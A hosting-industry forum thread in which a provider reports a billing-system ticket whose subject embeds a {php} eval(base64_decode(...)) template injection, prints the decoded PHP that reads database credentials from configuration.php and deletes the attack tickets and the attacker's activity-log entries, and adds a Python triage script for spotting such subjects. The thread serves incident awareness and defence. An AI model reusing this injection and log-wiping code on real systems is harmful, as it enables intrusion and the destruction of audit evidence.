Status
Not open for further replies.

_Hosting_

Hi everyone,

I don't know if it's related to the recent hack or what,

In Mxzon's billing system, we got a ticket with subject:

Code:
{php}eval(base64_decode('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'));{/php}

Decoded:
Code:
$text=file_get_contents("configuration.php");


$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);

eval($text);

$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog  WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);

I don't know if it worked, but it didn't harm our billing system...
I deleted the ticket. Please be alert, as I think boxslots and servedome are also having issues...

I think if we disable eval it can make this hack zero...
What do you guys suggest?

Regards,
Ali Arshad
Founder / CEO
Mxzon Hosting Solutions
(www.mxzon.com)
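
An added triage example (not part of the original post, and not WHMCS code): it flags ticket subjects that carry a {php} template block, decodes the base64 argument, and decodes MySQL hex literals such as the 0x257B7068707D25 in the decoded payload above. The function names and the sample subject are constructed for illustration.

```python
import base64
import re

# Smarty-style {php}...{/php} block, as seen in the ticket subject.
PHP_TAG = re.compile(r"\{php\}(.*?)\{/php\}", re.I | re.S)
B64_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
# MySQL hex string literal, e.g. 0x257B7068707D25.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9A-Fa-f]{2})+)\b")


def decode_hex_literals(text):
    """Map each 0x... literal found in text to the string it encodes."""
    return {"0x" + m.group(1): bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(text)}


def triage_subject(subject):
    """Return None for a clean subject, else details of the embedded code."""
    tag = PHP_TAG.search(subject)
    if tag is None:
        return None
    finding = {"template_code": tag.group(1), "decoded": None,
               "hex_literals": {}}
    b64 = B64_EVAL.search(tag.group(1))
    if b64:
        try:
            raw = base64.b64decode(b64.group(1))
            finding["decoded"] = raw.decode("utf-8", "replace")
        except ValueError:
            pass  # malformed base64: the ticket is still flagged
    if finding["decoded"]:
        finding["hex_literals"] = decode_hex_literals(finding["decoded"])
    return finding


# Constructed sample: one statement from the decoded payload, re-encoded.
SAMPLE_PAYLOAD = ('$delete ="DELETE from tbltickets '
                  'WHERE title like 0x257B7068707D25;";')
SAMPLE_SUBJECT = ("{php}eval(base64_decode('"
                  + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
                  + "'));{/php}")

if __name__ == "__main__":
    for subject in ("Invoice question", SAMPLE_SUBJECT):
        print(repr(subject[:40]), "->", triage_subject(subject))
```

The hex literal decodes to `%{php}%`, so the first DELETE in the decoded payload targets tickets whose title contains `{php}`, and the second removes activity log rows for the submitting IP address.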
 
6 comments
I got the same support ticket submitted today from a France IP Address.

I already applied the WHMCS patch the day it was released.
 